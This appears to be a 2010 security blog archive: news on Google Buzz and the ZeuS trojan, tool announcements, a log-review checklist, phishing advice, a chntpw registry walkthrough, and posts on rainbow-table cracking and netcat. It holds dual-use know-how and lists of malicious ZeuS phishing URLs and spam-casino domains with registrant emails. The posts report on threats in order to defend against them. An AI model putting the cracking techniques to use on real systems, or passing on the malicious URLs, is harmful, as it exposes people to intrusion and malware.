Buzz is Google's rival to Facebook and Twitter. It's integrated into Gmail and allows users to follow and reply to posts made by people they decide to follow on the service.

The service also allows users to share information from other Google-owned services such as Google Reader (an RSS newsreader) and picture-sharing site Picasa. It was clearly designed to encourage users to spend more time in Gmail and thus be more attractive to advertisers.

Automated 'Followers' Idea Backfires

The big problem with the launch was that Google decided to "help" users by automatically adding in some online followers from their email address book. This annoyed many users as they felt some of their information was now being shared with other people without their permission.

In one extreme case, a woman said she was automatically made a Buzz contact of an abusive ex-partner who only appeared as a regular email contact because they had been sending harassing messages.

FTC Commissioner Critical of Service
To make things worse, many users were in the dark about the implications of the Buzz service, with some believing their entire email history had been exposed. Others found opt-out settings but, because of the close integration, believed that turning off Buzz could only be done by quitting the email service altogether.

A privacy watchdog and several politicians complained about the move to the Federal Trade Commission. Although not a formal response to the complaints, one commissioner later said "I do not believe consumer privacy [considerations] played any significant role in the release of Buzz." (Source: bbc.co.uk)

Google Confirms Test Failure

Google later admitted it had only tested the service on its own staff rather than the usual test panel of employees' friends and family. That may have meant the results were distorted, as Google workers may have been more tech-savvy and less concerned about privacy implications than the general public.

Shortly after the launch, Google responded to criticism by simplifying the processes for blocking "followers," changing privacy settings or quitting Buzz altogether, but this only applied to new Buzz users. The firm also dropped the automated following system and replaced it with a list of suggested contacts.

This week's announcement goes a step further: the firm will now ask every user to specifically change or reconfirm their privacy option settings. That move, albeit late in the day, will go some way towards answering criticism that both Buzz and other social networking services need to adopt a policy of making all user data as private as possible until the user specifically says otherwise. (Source: pcmag.com)

Payment Card Industry Rock

2010-04-12T20:26:00.001+05:30

Do you remember those old School House Rock commercials from the 70’s? I do, in part because someone gave my kids a DVD set with all of them on it. And apparently the folks at the PCI Council remember them too, because they’ve created a video that looks a lot like those old commercials. My favorite part is the fact that Bob Russo let a cartoon version of himself be part of the video. I wonder if the real Mr. Russo can sing and play the guitar?

StreamArmor – Discover & Remove Alternate Data Streams (ADS)

2010-04-10T20:25:00.000+05:30

What are ADS (Alternate Data Streams)?

If you’ve had any experience with advanced malware or Windows forensics you’d already know what ADS are, but if you haven’t is a lesser known feature of the Windows NTFS file system which provides the ability to put data into existing files and folders without affecting their functionality and size. Any such stream associated with file/folder is not visible when viewed through conventional utilities such as Windows Explorer or DIR command or any other file browser tools.

StreamArmor is a tool for discovering hidden alternate data streams (ADS) and can also clean them completely from the system. It’s advanced auto analysis coupled with online threat verification mechanism makes it the best tool available in the market for eradicating the evil streams. StreamArmor comes with fast multi threaded ADS scanner which can recursively scan over entire system and quickly uncover all hidden streams. All such discovered streams are represented using specific color patten based on threat level which makes it easy for human eye to distinguish between suspicious and normal streams.

StreamArmor has built-in advanced file type detection mechanism which examines the content of file to accurately detect the file type of stream. This makes it great tool in forensic analysis in uncovering hidden documents/images/audio/video/database/archive files within the alternate data streams. StreamArmor is the standalone, portable application which does not require any installation. It can be copied to any place in the system and executed directly.

Platform

Windows XP, 2K3, Vista, Longhorn and Windows 7 (both 32 & 64 bit versions) On 64 bit platform, only 32 bit processes are supported.

You can download StreamArmor v1.0 here
http://www.rootkitanalytics.com/tools/streamarmor.php

Flint – Web-based Firewall Rule Scanner

2010-03-28T09:19:00.001+05:30

Flint examines firewalls, quickly computes the effect of all the configuration rules, and then spots problems so you can:

•CLEAN UP RUSTY CONFIGURATIONS that are crudded up with rules that can’t match traffic.
•ERADICATE LATENT SECURITY PROBLEMS lurking in overly-permissive rules
•SANITY CHECK CHANGES to see if new rules create problems.
Flint is absolutely free. There’s no catch. You can download the source from the git repository. This isn’t the “play at home” version; it’s their second product, and they want to do it open source.

Why You Need Flint

You have multiple firewalls protecting internal networks from the Internet and controlling access to customer data. Your business changes, and so do your firewalls, and not always at the same time. Firewalls can get out of step with policies.

Everybody makes mistakes. To understand a firewall configuration, you have to read hundreds of configuration lines, and then you have to think like a firewall does. People aren’t good at thinking like firewalls. So most firewalls are riddled with subtle mistakes. Some of those mistakes can be expensive:

•INSECURE SERVICES might be allowed through the firewall, preventing it from blocking attacks.
•LAX CONTROLS ON DMZs may expose staging and test servers.
•FIREWALL MANAGEMENT PORTS may be exposed to untrusted networks.
•REDUNDANT FIREWALL RULES may be complicating your configuration and slowing you down.

You can download Flint here:

VMWare Virtual Machine – FlintVM-current.zip
OVF Virtual Machine – FlintVM-current.ovf.zip
Source – flint-current.tgz

http://runplaybook.com/p/11

Critical Log Review Checklist for Security Incidents

2010-03-24T23:25:00.000+05:30

This cheat sheet presents a checklist for reviewing critical logs when responding to a security incident. It can also be used for routine log review.

General Approach

Identify which log sources and automated tools you can use during the analysis.
Copy log records to a single location where you will be able to review them.
Minimize “noise” by removing routine, repetitive log entries from view after confirming that they are benign.
Determine whether you can rely on logs' time stamps; consider time zone differences.
Focus on recent changes, failures, errors, status changes, access and administration events, and other events unusual for your environment.
Go backwards in time from now to reconstruct actions after and before the incident.
Correlate activities across different logs to get a comprehensive picture.
Develop theories about what occurred; explore logs to confirm or disprove them.

Potential Security Log Sources

Server and workstation operating system logs

Application logs (e.g., web server, database server)
Security tool logs (e.g., anti-virus, change detection, intrusion detection/prevention system)
Outbound proxy logs and end-user application logs
Remember to consider other, non-log sources for security events.

Typical Log Locations
Linux OS and core applications: /var/log

Windows OS and core applications: Windows Event Log (Security, System, Application)
Network devices: usually logged via Syslog; some use proprietary locations and formats

What to Look for on Linux
Successful user login----- “Accepted password”,“Accepted publickey”,"session opened”

Failed user login----- “authentication failure”,“failed password”
User log-off----- “session closed”
User account change or deletion----- “password changed”,“new user”,“delete user”
Sudo actions----- “sudo: … COMMAND=…” “FAILED su”
Service failure----- “failed” or “failure”

What to Look for on Windows
Event IDs are listed below for Windows 2000/XP. For Vista/7 security event ID, add 4096 to the event ID.

Most of the events below are in the Security log; many are only logged on the domain controller

User logon/logoff events----- Successful logon 528, 540; failed logon 529-537, 539; logoff 538, 551, etc

User account changes----- Created 624; enabled 626; changed 642; disabled 629; deleted 630
Password changes----- To self: 628; to others: 627
Service started or stopped----- 7035, 7036, etc.
Object access denied (if auditing enabled)----- 560, 567, etc

What to Look for on Network Device
Look at both inbound and outbound activities.

Examples below show log excerpts from Cisco ASA logs; other devices have similar functionality.

Traffic allowed on firewall----- “Built … connection”,“access-list … permitted”

Traffic blocked on firewall----- “access-list … denied”,"deny inbound”,“Deny … by”
Bytes transferred (large files?)----- “Teardown TCP connection … duration … bytes …”
Bandwidth and protocol usage----- “limit … exceeded”,“CPU utilization”
Detected attack activity----- “attack from”
User account changes----- “user added”,“user deleted”,“User priv level changed”
Administrator access----- “AAA user …”,“User … locked out”,“login failed”

What to Look for on Web Servers
Excessive access attempts to non-existent files

Code (SQL, HTML) seen as part of the URL
Access to extensions you have not implemented
Web service stopped/started/failed messages
Access to “risky” pages that accept user input
Look at logs on all servers in the load balancer pool
Error code 200 on files that are not yours

Failed user authentication----- Error code 401, 403

Invalid request----- Error code 400
Internal server----- error Error code 500

Google Talk used to distribute Fake AV

2010-03-22T15:48:00.001+05:30

Maria Varmazis, a colleague from our Boston office, got to experience what happens when a friend's account is compromised. When she logged onto Gmail, she got a pop-up message from someone she regularly chats with: "Hey are you on Facebook ??? If u are then check this out ". Wisely, Maria didn't click on the link and instead passed it on to me to investigate.

The link led me to a web page that had some dancing stick people and a link that read, "Click on the picture to download my party pictures gallery. . . (Click Open or Run when prompted.)".

Of course I wanted to view this party picture gallery. . . Past experience tells me the best pictures are taken after 11pm at parties. When I clicked the image, Internet Explorer presented a download prompt for a file called my_image_gallery.scr

This attack once again shows us the importance of defense in depth. An administrator for an organizational network has several chances to prevent this infection:

1.Education. Teach end users how to spot something out of the ordinary, to avoid clicking links in IMs, and what techniques are used in social engineering.

2.Anti-virus. As Virus Bulletin regularly demonstrates, the majority of up-to-date anti-virus products protect against most in-the-wild threats.

3.Proactive protection. Using heuristic, behavioral and other techniques provides protection against malicious code that may not yet be detected by your anti-virus definitions.

4.Web filtering. Both the site offering malware for me to download, and the one that was luring me into clicking the picture were blocked by the Sophos Web Appliance as malicious. Our web appliance also scans all your downloads for malware, and lets you disable downloading of dangerous filetypes.

Unfortunately, quite often our friends may not really be our friends. Use this as a reminder to stay vigilant and warn others about this type of attack.

Top 10 Ways to avoid Phishing Scams - Please Forward To All Non-IT People You Konw.

2010-03-19T20:49:00.000+05:30

The phenomenon of internet phishing scams is a serious problem, and the number and sophistication of these schemes are increasing all the time. Individuals using the web for personal or business reasons must be alert to possible fraud, and employers should warn their employees and customers to be extremely selective about giving out personal financial information over the Internet.

The following is a list of suggestions and recommendations that may help people avoid becoming a victim of these online phishing scams.

1. Never fill out forms in e-mail messages that ask for personal financial information. Many Phishing scams are designed to get access to accounts that can then be drained of funds by the scammers

2. Check your online accounts regularly, as well as your bank, credit and debit card statements to make sure all transactions are legitimate.

3. If you suspect an e-mail might not be authentic, don't use the links within the e-mail to get to a webpage, as it may leave your computer vulnerable. Often the entire point of these e-mails is to get you to do just that.

4. You should always be suspicious of any e-mail with “urgent” requests for personal financial information.

5. If you do provide personal information (like a credit card number), do so only via a secure website or the telephone.

6. Always make sure you're on a secure Web server when sharing sensitive information. To do so, check the beginning of the URL in your browser address bar. It should be "https" rather than "http." The "s" stands for secure.

7. It’s advisable to install a Web browser toolbar to alert you before you visit known phishing fraud websites.

8. If you receive an e-mail message that is not personalized, assume it's a shady message.

9. If e-mails use upsetting or exciting statements to try to get you to react immediately, that’s a red flag signaling to stop and think carefully about your next move; these statements are almost always false anyway.

10. Make sure that your browser is up-to-date and security patches have been applied.

How to Protect Yourself from ZeuS

2010-03-18T20:18:00.000+05:30

The security consultants recommends that businesses and home users carry out online banking and financial transactions on isolated workstations that are not used for general Internet activities, such as web browsing and reading email which could increase the risk of infection.

Businesses may even consider using an alternative operating system for workstations accessing sensitive or financial accounts. Keep your antivirus, operating system and software patches up to date. Also do not open suspicious e-mail attachments or links from people that you do not know and even if you do know them, check with them to find out if they sent you something prior to opening the email.

Additionally, awareness for both customers and employees is crucial. In particular, employees who interface with clients should be made aware of these types of threats to help triage potential victims.

Zeus Trojan Now Has Hardware Licensing Scheme

2010-03-18T07:36:00.000+05:30

The authors of the Zeus bot client, perhaps the most popular and pervasive piece of malware of its kind right now, have taken an extraordinary step to protect their creation: inserting a hardware-based licensing scheme into the Trojan. This represents a significant leap in the sophistication and professionalism of malware development, researchers say.

Zeus has been making the rounds on the Web for some time now, and it has gone through a number of revisions and upgrades in recent months. Its creators, who remain unknown, have steadily added more and more features and functionality to the package, including a form grabber for Firefox, the ability to add extra data fields to online banking applications, a backconnect module and support for Windows Vista and Windows 7.

Much of this is fairly standard stuff, but the addition of the hardware licensing/activation scheme is an interesting, unique twist. Researchers at SecureWorks have been analyzing each new iteration of the Zeus kit and found that the latest release, version 1.3.4.x, added this functionality, likely in an effort to prevent rivals from selling pirated versions of the attack kit.

"The author has gone to great lengths to protect this version using a Hardware-based Licensing System. The author of Zeus has created a hardware-based licensing system for the Zeus Builder kit that you can only run on one computer. Once you run it, you get a code from the specific computer, and then the author gives you a key just for that computer. This is the first time we have seen this level of control for malware.," Kevin Stevens and Don Jackson of SecureWorks wrote.

The newest release of Zeus is selling for $3,000 to $4,000 right now in private sales, the researchers said, and is being sold solely by the kit's author. Other, older versions have been sold publicly in the past, which likely led to the author taking the step of using the hardware licensing system to protect his creation.

While Zeus includes a wide range of capabilities now, its basic reason for being is to steal financial data. Think of it as a banker Trojan on steroids, the 2007 David Ortiz of malware. As the SecureWorks researchers found, Zeus does much of its dirty work through secure HTTP POST requests to the remote command-and-control server. It targets a broad spectrum of financial data, including credit card numbers, bank account numbers and online banking login credentials.

Stevens and Jackson said that the Zeus author is working on version 1.4 of the kit, which will include a polymorphic encryption feature.

"The 1.4 version of ZeuS will enable the ZeuS Trojan to re-encrypt itself each time it infects a victim, thus making each infection unique. The 1.4 version also enables the ZeuS file names to be randomly generated, thus each infection will contain different file names. This will make it very difficult for anti-virus engines to identify the ZeuS Banking Trojan on the victims’ system," they said.

Google search reveals 3 million pages link to rogue AVs

2010-03-17T11:56:00.001+05:30

Do you know what the latest version of Adobe’s Flash Player is? If you don’t, you may very well fall for this:

Flash Player 11?

There are more than 3 million pages linking to this alleged version 11:

Most pages are from unsanitized forums, but there is even a Google Ad for it! Ooooops….

The screen below depicts the social engineering trick: What appears to be an X-rated video with a Windows Media Player logo (that is odd!).

What intrigued me in that screenshot was that this malicious post was made with a user account that was highly rated:Such posts are automated, so I’d guess this user got his credentials stolen. Regardless, it adds to the deceptiveness, coming from what looks like an ‘approved’ forum user.

What happens next is an intermediary URL, freevideos.osa.pl/video.php?, redirects you to fast flux domains updated on a regular basis, all showing the well known “YouTube-like” screenie:

Clicking on it will download ‘video-plugin.45210.exe’ (Virus Total detection here)

So, what really is the latest Adobe Flash Player? The answer: 10.0.45.2

You can find it here http://www.adobe.com/software/flash/about/

Looks like the bad guys are already one step ahead. By the way, I did a Google search with version 12 and it returned nothing

In the meantime, there are million of pages out there fooling people and infecting them with a non-existent Flash Player version.

Fixing the Windows Registry Using Backtrack

2010-03-16T10:07:00.000+05:30

BackTrack is the most popular Linux live CD distribution focused on penetration testing. It comes loaded with all the top security tools so that you can immediately startup with your work without the need for downloading and installing any of the security tools.

One of the use of BackTrack is to fix Windows problems such as fixing the registry, resetting the user passwords etc. Here I am going to explain how we can use BackTrack to fix the Windows registry.

Often times, we mess up with the registry leaving the system in hanged state. In such situations BackTrack plays major role to put you back on track.

Registry Recovery Operation
To start with, boot your system with BackTrack CD. After booting you have to make sure that your Windows system partition is mounted in read/write mode. If your system partition has NTFS file system then you have to unmount that partition and remount in read/write mode.

Lets assume that your system partition is /dev/hda1 which is currently mounted on to /mnt/hda1. You can use 'mount' command to view the devices and their respective mount points.

To unmount this partition use following command
# umount /mnt/hda1

Now to mount it with read/write access, execute the following command
# mount -o rw /dev/hda1 /mnt/hda1

If the above method does not work then use the following method specified by Muts of BackTrack. For FAT32 partition, you need not have to do anything as it is already mounted with read/write access.

Using Chntpw tool to Edit Windows Registry
Now go to config folder on your system partition which has all registry hives.
# cd /mnt/hda1/windows/system32/config

Then type 'chntpw' command to view its help screen. This tool comes with built-in registry editor which can be used to manipulate any part of the registry. To invoke registry editor you have to specify -e option with the name of registry hive file. Entire Windows registry data is stored in couple of hive files. Here is the table below that shows mapping between the hive file and the part of the registry. Based on what part of the registry you are going to modify, you have to select corresponding hive file.

Let me explain the complete registry editing operation with an example. Assume that 'Windows Themes service' is preventing normal booting of your system. Now to bring your system back to normal you need disable this service.

The registry key for the Themes service is located here.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Themes

To disable this service, we have to change the 'Start' value (under above mentioned key) to '4'.
Start REG_DWORD 4

Now from the above table, its clear that we have to use 'SYSTEM' hive file for editing with 'chntpw'. Type the command as shown below.
# chntpw -e SYSTEM

At the new command prompt type ? to see various commands used for registry editing. Most useful commands are dir,cat,cd,ed etc.

Now type 'dir' command to see all the subkeys under the root key. You will see many ControlSet00* keys under this, but where is the CurrentControlSet key. We need this subkey to edit properties of Themes service..!

Well, don't be panic. The answer is hidden in 'Select' subkey. Now enumerate all the values under 'Select' subkey as shown below.

> cd Select
> dir

Now the value associated with 'Current' subkey will tell you which is the currently used ControlSet00* key. For example if the 'Current' has value 2 then that means you have to select 'ControlSet002' etc. On my machine the 'Current' has value 1. So I am going to select 'ControlSet001' key.

Know we know which controlset we have to use for our purpose. Now select it and move on to Themes subkey as shown below. Note that we are under Select key. You have to go back to root key to choose the ControlSet key.
> cd..
> cd ControlSet001\Services\Themes

Now type 'dir' command to see all the names and their values under this key. We have to just change DWORD value of 'Start' to 4 using the 'ed' command.
> ed Start

When you are prompted to enter new value, just type 4 and press 'ENTER' to set the new value.To verify use the below shown command.
> cat Start

Once you have modified all required changes, type 'q' to quit the registry editor and then press 'y' to save your changes. After that restart the system and you should be able to login normally without any problem.

Remote VNC Installation

2010-03-15T08:08:00.002+05:30

RealVNC is a server and client application for the Virtual Network Computing (VNC) protocol to control another computer's screen remotely. The company RealVNC Ltd. — founded by the same AT&T team which created the original VNC program — produces the RealVNC software. RealVNC runs on Windows, Mac OS X (Enterprise edition only), and many Unix-like operating systems (both free and enterprise-class). A RealVNC client also runs on the Java platform and on the iPhone. A Windows-only client is now available, designed to interface to the embedded server on Intel AMT chipsets found on Intel vPro motherboards.

New phishing campaign against Facebook led by Zeus

2010-03-15T08:07:00.000+05:30

Some time ago we warned about different campaigns where the employer, in all cases without exception, is the exploitation of social engineering to execute a fraudulent component, and the goal is the theft of sensitive information.

Cases like the previous campaign by using the image of ZeuS Facebook and phishing attacks using popular services such as primary coverage, including IRS, VISA, Google and Blogger, among many others, are concrete examples that demonstrate what is the magnitude of the business ZeuS offers computer criminals.

A few days ago, a new campaign to materialize from the hand of ZeuS, involving a large battery of malicious domains. Among them:

downloads.legomay.com/id735rp/LoginFacebook.php
downloads.legomay.net/id735rp/LoginFacebook.php
downloads.legomay.org/id735rp/LoginFacebook.php
downloads.megavids.org/id735rp/LoginFacebook.php
downloads.migpix.com/id735rp/LoginFacebook.php
downloads.migpix.net/id735rp/LoginFacebook.php
downloads.migpix.org/id735rp/LoginFacebook.php
downloads.modavedis.com/id735rp/LoginFacebook.php
downloads.modavedis.net/id735rp/LoginFacebook.php
downloads.modavedis.org/id735rp/LoginFacebook.php
downloads.portodrive.org/id735rp/LoginFacebook.php
downloads.reggiepix.com/id735rp/LoginFacebook.php
downloads.reggiepix.net/id735rp/LoginFacebook.php
downloads.reggiepix.org/id735rp/LoginFacebook.php
downloads.regzapix.com/id735rp/LoginFacebook.php
downloads.regzapix.net/id735rp/LoginFacebook.php
downloads.regzapix.org/id735rp/LoginFacebook.php
downloads.regzavids.com/id735rp/LoginFacebook.php
downloads.regzavids.net/id735rp/LoginFacebook.php
downloads.regzavids.org/id735rp/LoginFacebook.php
downloads.restopix.org/id735rp/LoginFacebook.php
downloads.restpictures.com/id735rp/LoginFacebook.php
downloads.restpictures.net/id735rp/LoginFacebook.php
downloads.restpictures.org/id735rp/LoginFacebook.php
downloads.restway.net/id735rp/LoginFacebook.php
downloads.restway.org/id735rp/LoginFacebook.php
downloads.tastyfiles.net/id735rp/LoginFacebook.php
downloads.vedivids.com/id735rp/LoginFacebook.php
downloads.vedivids.net/id735rp/LoginFacebook.php
downloads.vedivids.org/id735rp/LoginFacebook.php
downloads.vediway.com/id735rp/LoginFacebook.php
downloads.vediway.net/id735rp/LoginFacebook.php
downloads.vediway.org/id735rp/LoginFacebook.php

auth.facebook.com.legomay.com/id735rp/LoginFacebook.php
auth.facebook.com.legomay.net/id735rp/LoginFacebook.php
auth.facebook.com.legomay.org/id735rp/LoginFacebook.php
auth.facebook.com.megavids.org/id735rp/LoginFacebook.php
auth.facebook.com.migpix.com/id735rp/LoginFacebook.php
auth.facebook.com.migpix.net/id735rp/LoginFacebook.php
auth.facebook.com.migpix.org/id735rp/LoginFacebook.php
auth.facebook.com.modavedis.com/id735rp/LoginFacebook.php
auth.facebook.com.modavedis.net/id735rp/LoginFacebook.php
auth.facebook.com.modavedis.org/id735rp/LoginFacebook.php
auth.facebook.com.portodrive.org/id735rp/LoginFacebook.php
auth.facebook.com.reggiepix.com/id735rp/LoginFacebook.php
auth.facebook.com.reggiepix.net/id735rp/LoginFacebook.php
auth.facebook.com.reggiepix.org/id735rp/LoginFacebook.php
auth.facebook.com.regzapix.com/id735rp/LoginFacebook.php
auth.facebook.com.regzapix.net/id735rp/LoginFacebook.php
auth.facebook.com.regzapix.org/id735rp/LoginFacebook.php
auth.facebook.com.regzavids.com/id735rp/LoginFacebook.php
auth.facebook.com.regzavids.net/id735rp/LoginFacebook.php
auth.facebook.com.regzavids.org/id735rp/LoginFacebook.php
auth.facebook.com.restopix.org/id735rp/LoginFacebook.php
auth.facebook.com.restpictures.com/id735rp/LoginFacebook.php
auth.facebook.com.restpictures.net/id735rp/LoginFacebook.php
auth.facebook.com.restpictures.org/id735rp/LoginFacebook.php
auth.facebook.com.restway.net/id735rp/LoginFacebook.php
auth.facebook.com.restway.org/id735rp/LoginFacebook.php
auth.facebook.com.tastyfiles.net/id735rp/LoginFacebook.php
auth.facebook.com.vedivids.com/id735rp/LoginFacebook.php
auth.facebook.com.vedivids.net/id735rp/LoginFacebook.php
auth.facebook.com.vedivids.org/id735rp/LoginFacebook.php
auth.facebook.com.vediway.com/id735rp/LoginFacebook.php
auth.facebook.com.vediway.net/id735rp/LoginFacebook.php
auth.facebook.com.vediway.org/id735rp/LoginFacebook.php

The folder Id735rp also contains kit phishing, ZeuS trojan, which in this case appears under the name photo.exe (19d9cc4d9d512e60f61746ef4c741f09).

Even in the same URL format strategy is being used by another known crimeware: Phoenix Exploit Pack.

Evil Sports Sites

2010-03-14T07:19:00.001+05:30

A Google query to us that points to yet another temptation that the criminals are taking advantage of - the March Madness basketball tournaments here in the USA. I'm sure that other sporting events are just as popular with the scammers and crooks. If you want to check out the fun, put this into your browser:

http://www.google.com/search?q=big+ten+tournament+2010+wiki

We trust that you are not crazy enough to click on the links that Google marks as hazardous to your computer's health, but if you do and you net something really cool that you'd like to analyze, please let me know what you uncover.

Password cracker 100 times faster with an SSD

2010-03-13T11:05:00.000+05:30

The security specialist Objectif Sécurité has optimised its rainbow tables – a common tool used to crack password hashes – to make use of SSDs. The result is, according to Objectif Sécurité's Philippe Oechslin, an acceleration by a factor of 100 when compared to their old 8GB Rainbow Tables for XP hashes. A web form takes the XP-hashes and cracks them for free with the new, ten times larger tables.

Oechslin has fitted an elderly Athlon 64 X2 4400+ with an SSD and the optimised tables. This system can, with only a 75% CPU utilisation, crack a 14 digit password with special characters, in an average of 5.3 seconds. Oechslin says that, worst case, it should be able to search arithmetically through 300 billion passwords per second, a speed that is a factor of 500 faster than an Elcomsoft cracker supported by a modern Tesla GPU from NVIDIA.

Calculations with rainbow tables achieve the acceleration by pre-computing the intermediate steps of all possible password hashes for a specific algorithm and then storing those results as a table. The more steps that are stored, the bigger the tables and the faster the cracking process. Once the tables no longer fit in memory, the less-used parts of the tables are saved on mass storage devices, previously this would have been a hard disk, which in turn leads to slower access times while searching them.

Rainbow Cracking - MD2, MD4, MD5, SHA1,L1

2010-03-13T09:46:00.000+05:30

RainbowCrack is a computer program which generates rainbow tables to be used in password cracking. RainbowCrack differs from "conventional" brute force crackers in that it uses large pre-computed tables called rainbow tables to reduce the length of time needed to crack a password drastically. RainbowCrack was developed by Zhu Shuanglei, and implements an improved time-memory trade-off cryptanalysis attack which originated in Philippe Oechslin's Ophcrack.

As RainbowCrack's purpose is to generate rainbow tables and not to crack passwords per-se, some organizations have endeavored to make RainbowCrack's rainbow tables available free over the internet.

Hackers leave Orissa Govt website ‘tipsy-turvy’

2010-03-13T00:58:00.001+05:30

Description:

If you click open Orissa Government's official website even as you read this piece of news, chances are that it would show you the price list of various kinds of liquor available in Delhi.

Chances are that it is still dishing out details of Delhi's entertainment and luxury tax structure. And why? Hackers seemed to have breached security firewalls of the State Government website - www.orissa.gov.

in/www.orissagov.nic.in - and in its place appears the official website of Excise Department of Government of National Capital Territory (NCT) of Delhi.

The matter came to notice only on Thursday evening, a few good hours after offices of State Government had closed for the day, it was not immediately possible to ascertain who could be behind the mischief.

As a result, those who logged into the site found, much to their curiosity, details of price list of various alcohol Delhites enjoy - whisky, beer, rum, wine, gin, vodka, brandy, and yes, country liquor too.

"It appears to be handiwork of some mischief mong ers who defaced the State Government website and placed such a webpage," said a software professional of the city.

It was not immediately known if the act could have anything to do with the huge information stored on the website or those who were behind it made any attempt to break into the servers.

http://www.expressbuzz.com/edition/story.aspx?Title=HackersleaveOrissaGovtwebsite?tipsy-turvy?&artid=0gAZYycyx2A=&SectionID=fyV9T2jIa4A=&MainSectionID=fyV9T2jIa4A=&SectionName=nUFeEOBkuKw=&SEO=NCT,Hackers,whisky,beer,rum,wine,gin,vodka

Bypassing Firewalls Using Reverse Telnet

2010-03-12T11:28:00.001+05:30

Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable “back-end” device that can be used candidly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.

In 2000 according to www.insecure.org Netcat was voted the second most functional network security tool. Also, in 2003 and 2006 it gained fourth place in the same category. Netcat is often referred to as a "Swiss-army knife for TCP/IP." Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.

According to http://nc110.sourceforge.net, some of netcat's major features are:

•Outbound or inbound connections, TCP or UDP, to or from any ports
•Full DNS forward/reverse checking, with appropriate warnings
•Ability to use any local source port
•Ability to use any locally-configured network source address
•Built-in port-scanning capabilities, with randomization
•Built-in loose source-routing capability
•Can read command line arguments from standard input
•Slow-send mode, one line every N seconds
•Hex dump of transmitted and received data
•Optional ability to let another program service established connections
•Optional telnet-options responder
•Featured tunneling mode which allows also special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel.

Hostmap

2010-03-12T08:08:00.000+05:30

What is hostmap?

Hostmap is a free, automatic, hostnames and virtual hosts discovery tool written in Ruby by Alessandro `jekil` Tanasi and licensed under GNU General Public License version 3 (GPLv3). It's goal is to enumerate all hostnames and configured virtual hosts on an IP address. The primary users of hostmap are professionals performing vulnerability assessments and penetration tests.

The major features are:
DNS names and virtual hosts enumeration
Multiple discovery techniques, to read more see documentation.
Results correlation, aggregation and normalization
Multithreaded and event based engine
Platform independent

Download:
http://sourceforge.net/projects/hostmap/files/

404 error:

2010-03-11T10:10:00.001+05:30

Don't Play Poker on an Infected Table - Part Three

2010-03-10T10:27:00.000+05:30

The monetization of phony online gambling networks -- clearly tolerating systematic violation of their TOS -- is continuing with the scammers behind last month's campaign (Don't Play Poker on an Infected Table - Part Two) spamvertising another portfolio of domains using new templates.

It's worth pointing out that the spammers don't just earn revenue every time someone installs the application, but also, every time the, now converted visitor, interacts financially with the service, a monetization approach you'll see in the attached screenshots.

Detection rates for the spamvertised binaries (downloaded from gamez-lux.com and we3tt.com) : StarsVIPCasino_Setup.exe - Result: 14/42 (33.33%); GoldenMummyEN.exe - Result: 9/42 (21.43%); RubyRoyaleEN.exe - Result: 11/42 (26.19%). Sample phone back locations: download.thepalacegroupgaming.com; pcm3.valueactive.eu; rubyfortune.mgsmup.com

Spamvertised domains include:

adrembovesttes.net - Email: pengjiajie222@163.com
bonuscasinoslux.net - Email: fgsdvbbvd@qq.com
bonusgameslux.net - Email: fgsdvbbvd@qq.com
bonusluxcasinos.net - Email: fgsdvbbvd@qq.com
bonusluxplays.net - Email: fgsdvbbvd@qq.com
bonusplayslux.net - Email: fgsdvbbvd@qq.com
casinosbonuslux.net - Email: fgsdvbbvd@qq.com
casinosluxclub.net - Email: fgsdvbbvd@qq.com
casinosluxstar.net - Email: fgsdvbbvd@qq.com
clopelinesutes.net - Email: fgsdvbbvd@qq.com
clubgameslux.net - Email: fgsdvbbvd@qq.com
clubluxgames.net - Email: fgsdvbbvd@qq.com
club-of-lux.net - Email: fgsdvbbvd@qq.com
clubs-play.net - Email: fgsdvbbvd@qq.com
clubvegas-games.net - Email: fgsdvbbvd@qq.com
gameclubviva.net - Email: fgsdvbbvd@qq.com
game-lux-club.net - Email: fgsdvbbvd@qq.com
gamesbonuslux.net - Email: fgsdvbbvd@qq.com
games-gold.net - Email: fgsdvbbvd@qq.com
gameslux.net - Email: fgsdvbbvd@qq.com
gamesstarlux.net - Email: fgsdvbbvd@qq.com
gamevivagold.net - Email: fgsdvbbvd@qq.com
gorxshop.net - Email: sdfxckj@msn.com
hannoweramtes.net - Email: ftyughsere@qq.com
lutiok.net - Email: ftgy23fge@126.com
luxbonusgames.net - Email: fgsdvbbvd@qq.com
luxbonusplays.net - Email: fgsdvbbvd@qq.com
luxcasinosbonus.net - Email: fgsdvbbvd@qq.com
luxclubcasinos.net - Email: fgsdvbbvd@qq.com

luxclubplays.net - Email: fgsdvbbvd@qq.com

luxgamesbonus.net - Email: fgsdvbbvd@qq.com
luxgamesstar.net - Email: fgsdvbbvd@qq.com
luxplaysclub.net - Email: fgsdvbbvd@qq.com
luxplaysstar.net - Email: fgsdvbbvd@qq.com
luxs-games.net - Email: fgsdvbbvd@qq.com
luxstarplays.net - Email: fgsdvbbvd@qq.com
mollehoukutes.net - Email: guoaiwense@163.com
murgadobarotes.net - Email: guoaiwense@163.com
namedosaras.net - Email: ftyughsere@qq.com
pay3500win.net - Email: dfgdvbcv@sina.com
playeuro777.net - Email: fghvvbcfgds@tom.com
playeuro888.net - Email: fghvvbcfgds@tom.com
playglobal777.net - Email: dfhhjg4ee@163.com
playsclublux.net - Email: fgsdvbbvd@qq.com
playsluxclub.net - Email: fgsdvbbvd@qq.com
realcash-mine.net - Email: dfgdvbcv@sina.com
realcash-offer.net - Email: dfgdvbcv@sina.com
realcash-wins.net - Email: dfgdvbcv@sina.com
regal-jackpot.net - Email: dfgdvbcv@sina.com
regalvegas-online.net - Email: dfgdvbcv@sina.com
royalcasino777.net - Email: edwfrsdf@126.com
royalcasino888.net - Email: edwfrsdf@126.com
royalvegas-play.net - Email: dfgdvbcv@sina.com
satregonovates.net - Email: pengjiajie222@163.com
softaserutes.net - Email: ftyughsere@qq.com
softoutnertes.net - Email: ftyughsere@qq.com
softuoplowtes.net - Email: ftyughsere@qq.com
stargameslux.net - Email: ftyughsere@qq.com
starluxcasinos.net - Email: ftyughsere@qq.com
sundowutortes.net - Email: guoaiwense@163.com
vegasclubsgame.net - Email: fgsdvbbvd@qq.com
vegasgamesclub.net - Email: fgsdvbbvd@qq.com

Phony affiliate networks are reserve the right to forward the responsibility for the malicious activity to participants violating their Terms or Service. A violation that earned both parties significant amounts of money, in between

